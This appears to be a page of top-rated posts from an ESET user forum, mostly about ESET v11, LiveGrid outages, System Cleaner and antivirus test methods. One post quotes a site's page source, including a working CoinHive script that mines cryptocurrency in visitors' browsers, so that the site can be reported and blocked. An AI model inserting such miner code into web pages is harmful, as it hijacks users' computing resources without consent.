Popular Content

Showing content with the most kudos since 10/20/2017 in all areas

  1. 5 likes
    With all the hoo-haa about v11's release, I think the 30th anniversary of NOD's code development was (kind of) overlooked. So I just want to say Congratulations ESET on 30 years of protection and product development. It's easy to get lost in the day to day issues, but 30 years is an accomplishment to be proud of!
  2. 5 likes
    I've got information that LiveGrid servers should be up and running now alright.
  3. 4 likes
    Here is the latest from ESET US Support: (I am not sure if I'll receive any more updates from Support. If I do I will post them here)
    Update for Case #XXXXX - "Progissue - Otherprog"
    An ESET Technical Support Representative has updated this case with the following information:
    Hello,
    Thanks for your reply. We needed to rule out the issue with the scan file count was not due to a corrupted product update from v10 to v11. We did some internal testing with this after your reply and were able to reproduce the issue on our test environment. In older versions of ESET that "scan to administrator" was there when scanning your computer from a standard user account. We have escalated this issue to our developers for further analysis.
    Thank you for using ESET security products,
    ESET Technical Support North America
  4. 3 likes
    I would not take this tester above seriously in any way shape or form. He is concerned with YouTube traffic and not testing correctly. First I should mention, he likes to claim the use of zero days, anyone with any experience testing will know instantly, that these samples are far from this. They are collected from Virussign in sample packs, file extension renamed, and normally he renames the files themselves. He does not vet the samples for working/broken or legitimacy nor does he vet the samples for age and detection. He does not take the time to learn the product, how it functions and works as designed. As Marcos pointed out and is quite correct, his methodology is beyond flawed.
  5. 3 likes
    You can disable it (advanced setup, update, profiles, update mode and uncheck "application update"). Eventually, you will get popups when your version is very old (you can still click No). But that's over a year away.
  6. 2 likes
    Resets back to Computer default is all I understand it to mean. But I agree/understand that it would be good to have a list of what flagged it in the first place and what will be reset.
  7. 2 likes
    I don't think Facebook can be trusted with much of anything let alone nude pictures. A permanent solution would be to keep your clothes on when pictures are being taken. Yeah I know, too simple.
  8. 2 likes
    Since I never get any response from ESET, I just thought I would also post this here for an admin to make sure this site is blocked....here is a copy of the email I just sent to ESET Samples Team:
    Please check this site: https://www.techinferno.com/index.php?/forums/ and have ESET’s HTTP Scanner block it
    Just like to warn you guys that it would seem that techinferno has now started to use end users' computers to mine crypto currency. Just went on myself to check for some info and watched my CPU spike to 100% with the system lagging, even down to GPU driver crashing, so I closed the tab and it went back to normal. I then went and viewed the source for the index page. Here is what was found:
    <link rel='shortcut icon' href='****://sslcdn.techinferno.com/uploads/monthly_2017_08/favicon.ico.902cfabe37f7260915a7c8342595a33e.ico'>
    <script src="****://coinhive.com/lib/coinhive.min.js"></script>
    <script> var miner = new CoinHive.Anonymous('uWKXebL5jXICjXGj85wncylJDkRN9gVu'); miner.start(); </script>
    TOS
    Tech|Inferno is a technology website dedicated to discovering the latest breakthroughs in vbios, bios, egpu and other trends in the industry. As part of this dedication to cutting edge technology, we sometimes try new technologies as part of our codebase that can range from subtle advertising in the form of text to silent cryptocurrency mining. None of the technology we test on this website will ever adversely affect our end users as we try to keep it minimal and out of sight so that our users can maximize their enjoyment of Tech|Inferno without the typical advertisements cluttering their screens
  9. 2 likes
    -Edit- Just refer to the below screen shot as proof that Eset's URL list blocking does work. However and of course, it will not be triggered if the coin miner URL has been blocked by other means. Definitely "wild and crazy" Coin Hive mining going on! I found a way to get Eset's Web Filtering URL block list to detect the Coin Hive connection on the TechInferno web site as shown in the below screen shot. I will describe the "how" and speculate on the "why." I installed the Adblock Plus add-on for IE11. I then disabled the Fanboy Adblock TPLs; both the Easylist and the Easylist Privacy TPLs. Important - all TPLs have to be disabled or Adblock Plus won't allow for detection of this Coin Hive miner instance on the TechInferno web site. Now for the "speculation" as to why this works. Appears the connection to Coin Hive is somehow occurring through some type of redirect or "camouflaging". It also appears that Adblock Plus can "trace" this activity and resolve to the "real" https://coinhive.com/lib/coinhive.min.js address. As such, Eset's URL filtering can now detect it upon connection attempt. Bottom line - looks like Coin Hive has figured out a way to defeat host based URL filtering.
  10. 2 likes
    Is Internet Security immune to #AVGater? https://www.neowin.net/news/exploit-uses-antivirus-quarantine-to-release-malware
  11. 2 likes
    Yes, we've restored files under the account of the currently logged user and not under the system account. When attempting to exploit the vulnerability, you'd get an error like this from ESET's products:
  12. 2 likes
    It means the number of changes / differences from default settings in a particular branch of the setup.
  13. 2 likes
    Have only had this issue once since the thread was created, and it was confirmed by ESET themselves to be an outage on their server. Funny how it affects some and not others. There are lots of things that need to be considered that can cause the loss to the servers: high bandwidth consuming streaming, using bit torrent or similar file sharing apps, bad routing or load on the internet itself (causing regional issues), loss via Wi-Fi signal, Blocklisting software, poorly configured adapters, bad router settings, are just SOME starting points. Maybe if ESET has a webpage where the "LIVE" status of the LiveGrid server was displayed, with a Green / Amber / Red light type of alert, then the forums might not get flooded with messages either.
  14. 2 likes
    I really don't know what you're attempting to prove. Eset Internet/Smart Security detects the exploits used in WannaCry, EternalBlue and DoublePulsar, by CVE using its IDS which is part of its Network Protection. Ditto for the recent Bad Rabbit ransomware which used the EternalRomance exploit. Since you are using NOD32 which doesn't include network protection, you are not protected against these exploits. When you disabled NOD32's realtime protection, you also disabled any heuristic scanning and corresponding sandboxing. These components are used to supplement Eset's signature detection when a process performs suspicious activities including those associated with ransomware. It is assumed that the heuristic scanner will signal the HIPS to apply pre-defined rules used to detect ransomware activity by the process. The problem here is that encryption activity per se is not malicious since Windows itself performs like activities. Therefore, Eset needs to identify "good vs. bad" encryption activities.
  15. 2 likes
    Support for the latest version of the 1Password plug-in will be added in the Banking payment and protection module 1115.
  16. 2 likes
    I just want to say thank you for not going the route so many have gone and making a really horrible and ugly GUI and taking away most of the advanced options. I love the current one and I'm sure at some point it will need updating, but when that happens I hope you guys will continue the same approach! All my favorite GUIs are now gone, except with Eset you guys kept it fairly close.
  17. 2 likes
    Description: More information in system cleaner Detail: I have mentioned this previously. System cleaner is the new tool in version 11 that alerts you to system settings that have been changed from default, the idea being that they could have been changed by malware. The issue is they give no information on the actual setting, just the type of setting. I tested this feature by clicking to change settings, hoping I would be shown the changes and able to make a decision. What would make more sense is having a way to see the actual changes and a way to ignore certain changes that the user wants to keep. Many people change things themselves, e.g. Windows tweakers, and this feature could cause issues if they change things without realising. This could always be a more advanced option disabled by default. If this cannot happen, at least have a log for this feature so that advanced users can see the changes made. If Eset is changing a Windows option it shouldn't be too hard to log the change somewhere. Also an undo feature might be handy, as when I tried it out hoping I would be given options, Eset just changed them and with no log I have no idea what got changed.
  18. 2 likes
    Eset needs to create a log file for the feature and log in there what it finds. Again, quite a few folks revise OS settings from the default. Personally, if malware altered OS settings, I would opt for a Win 10 in-place repair instead. There are also utilities like those hosted on tweaking.com that many use to reset system defaults, repair the registry, etc. It also should be noted that if malware altered system settings, it is supposed to be the job of the AV to automatically repair those settings.
  19. 2 likes
    Bad result? I don't see any bad results there but there's definitely an issue with the methodology. As for the URLs, it appears to be there were no malicious ones that were not blocked by ESET but those not blocked was mainly fresh phishing from today which was not blocked at that time by any AV. As for the on-demand scan "test", I "like" tests where one puts all mess (benign files, apps with Chinese GUI, PUAs, etc.) into a folder, then scans the files and presents undetected files as misses. AVs that detect such files have FPs and should be penalized for that, but in these "tests" they get good points for detecting FPs. A credible tester should know what he or she has in the test set, should be able to distinguish malware from PUAs, greyware and other benign applications and remove such from the test set. Including non-malicious files usually substantially skews the final results. Also note that on-demand scans do not reflect the real-world scenario. In real world, malware is usually downloaded by malicious scripts on compromised websites or spread by spammed email. Running just an on-demand scan cannot test other protection layers that might have prevented the malware from being downloaded and executed.
  20. 2 likes
    I'll be happy to clarify, although I am immediately surprised that someone like yourself should have to ask that question. Why do I want to have the ability to disable auto-installation of ANYTHING on my computers? Simple answer is in case of bad upgrades pushed out by devs that then go on to cause great damage to the user's system. Could be a minor incompatibility with another security program, or it could be a major flaw that quality control did not catch and hundreds if not thousands of users are left with hosed operating systems. Why does Microsoft allow users to decide if they want to download and install monthly updates? Why do the vast majority of all security programs provide this option to their users? Because while a large segment of non-technically inclined users are content with auto-installation of new versions, there is also a segment who want to research change logs and peruse various forums to see if other users are reporting problems with new version releases. Again, this answer is so obvious, I am surprised that you would ask for clarification, Marcos. And it is discouraging to learn from you that there is no simple setting that I can employ to disable these forced upgrades.
  21. 2 likes
    If you had been using pre-release and changed to regular update, just wait until ESET do the next database update. If you checked now you should see you have 16296P, but after the next update it will be, for example, 16297.
  22. 2 likes
    Every year the top spot in this category of test (along with false alarm tests) is grabbed by Eset (probably it's been kept reserved lol). No wonder millions of people rely on Eset. It is the lowest footprint that Eset has maintained for decades, running PCs butter smooth with extremely low false positives. Keep up the good work, Eset.
  23. 2 likes
    Someone asked me a question on how Eset protects against this for UEFI BIOS and what component does so. Any tech references for this would be greatly appreciated.
  24. 2 likes
    http://chart.av-comparatives.org/chart1.php?chart=chart4&year=2017&month=10&sort=1&zoom=2 ESET, the king of performance once again!
  25. 1 like
    Please uninstall ESET in safe mode using the ESET Uninstall tool as per the KB https://support.eset.com/kb2289.
  26. 1 like
    I think it could be very useful if you had an infection screw up your system files. Otherwise not so much. But that's its purpose and I'm sure it would do it well.
  27. 1 like
    Some info about System Cleaner on the KB: https://support.eset.com/kb6564/#SystemCleaner
  28. 1 like
    I'm running ERA 6.5. The Win CLIENT has updates ready. I apply the Task to the CLIENT. ERA reports it's running and then finished successfully. There's CPU activity when ERA reports it's running but nothing happens: OS Updates are not installed. What do I have to do in order to get the feature to work? Regards.
  29. 1 like
    If you change the "block" action to "ask" and enable "Notify user," you can. You will receive an alert and can then choose "Block" or "Allow." This assumes one has the "smarts" to answer the alert properly.
  30. 1 like
    No problem here:
    Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here
    11/12/2017 8:38:30 PM;HTTP filter;file;hxxps://coinhive.com/lib/coinhive.min.js;JS/CoinMiner.F potentially unsafe application;connection terminated;DESKTOP-5JIJ6V4\Admin;Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    It's been detected for a month already.
  31. 1 like
    Changelog is always available if you go to the advanced download section for the product in question on ESET homepage. For this release:
    - Fixed: Unable to change protection state using keyboard
    - Fixed: Unable to select Region during License Key registration
    - Fixed: “Anti-Theft has been successfully disabled” message appears after changing the device name
    - Fixed: Username and password data for Updater go missing after product activation
    - Fixed: Gamer Mode does not work in Manual mode
    - Fixed: Various localization issues
    - Fixed: Various internal bugs
  32. 1 like
    Thank you very much, expert planet Everything is OK now, with my new bootable media Came
  33. 1 like
    The intention of Proton is to remain hidden and provide a backdoor on your Mac to steal all sorts of personal information. The WeLiveSecurity article that @itman linked provides a wonderful amount of detail about Proton — including how to manually check if you are compromised and what the payload does on the system. https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/
  34. 1 like
    You don't have to block twitter, you got the application installed. (else it won't show up in CCleaner) So if you don't use twitter, just uninstall it.
  35. 1 like
  36. 1 like
    Welcome to the Forum, illumination. We are glad to have you aboard. I'm sure you will enjoy your stay.
  37. 1 like
    I believe the issue is with scheduling a task - the user wants to schedule a task at a specific time but also scanning with administrative privileges which doesn't seem possible.
  38. 1 like
    Any HIPS allow or deny rules would be applied w/o issue at startup time. The issue is with "ask" rules. They are time dependent. If a response is not received within a specified time interval, the HIPS uses a default allow action. Also something you may not be aware of. User created rules do not completely override Eset set internal HIPS rules. I do know for sure this applies to both the "Auto" and "Smart" HIPS modes. These rules take precedence over any user created rules. If you don't know what I am referring to, open up the Eset GUI HIPS settings. Then in the advanced section, enable "log all blocked operations." In the HIPS log what you will observe is wording along the lines of "operation partially allowed/blocked" for your user created rules. What this indicates is an internal Eset HIPS rule has taken precedence over your user created rules. Make sure you disable "log all blocked operations" after testing since your HIPS log will rapidly contain many hundreds of entries.
  39. 1 like
    Ye, me too! It's more dangerous than useful (since Eset can't provide details).
  40. 1 like
    As far as I can gather it's just settings that aren't set to their standard default setting, the idea being that the system cleaner could revert changes made by malware. Sadly there is no way to find out the exact setting. I clicked fix hoping it would bring up more details but it just changed the settings to default and there's no undo option or a log to see changes. I mentioned this to Eset but it seems this is the way they want it and it would be too hard to show each individual changed option. I suggested a way to show more options even if disabled by default, as I could imagine people changing stuff to default they had changed themselves. I also suggested a way to ignore specific changes but it appears this won't happen.
  41. 1 like
    Appears by default the HIPS will only check program startup from the drive the OS is installed on. Create a HIPS rule for each drive you want to monitor startup activity by specifying for Applications -> Specific applications -> D:\*.* etc. I tested this and it does detect any program startup on the specified drive.
  42. 1 like
    So far 10/11 computers in my test group have no issues. I did notice that MS Edge stopped working for one domain user, but this seems to be a common issue with upgrading Windows 10.
  43. 1 like
    Hi, Version 11 has been released. However, ESET only provides the Live Installer. Since I have times the support contacted. I told them that I would not use the Live Installer and prefer the full installer. They have also sent me simply the link for the Live Installer. Do you know if there is still a full installer? Greetings
  44. 1 like
    If you are getting notifications about problems connecting to LiveGrid servers, please carry on as follows:
    - In the advanced setup -> tools -> log files, change logging verbosity to Diagnostics
    - Reboot the computer
    - Download CloudCar
    - Collect logs with ELC and provide me with the generated zip archive.
  45. 1 like
    Is the CloudCar test file detected as "Suspicious object" when you are getting this notification?
  46. 1 like
    It's hard to tell because there's no security solution that would detect 100% of threats. I'd suggest enabling detection of potentially unsafe applications and running a full disk scan.
  47. 1 like
    For not having the Live Grid not accessible message when you aren't connected with internet, you can disable it by going to: Advanced Configuration -> User Interface -> Application Status (Edit) -> General -> Eset Live Grid not accessible (Turn it Off)
  48. 1 like
    Hello Fabbel, we are sorry for the inconvenience caused. The Gamer mode behavior is a bug and will have to be fixed on our side, when you enable the automatic Gamer mode detection as a workaround, it should work correctly until we fix it. When it comes to the SSL/TLS inspection, which browser do you use? Does the issue persist after system reboot? Regards, P.R.
  49. 1 like
    Forgot to close this topic. After all I decided to simply reinstall Windows 10. Afterwards I installed Eset without a problem.
  50. 1 like
    In addition to Gentoo, this problem mainly seems to affect Ubuntu systems. In any case, the solution is simple.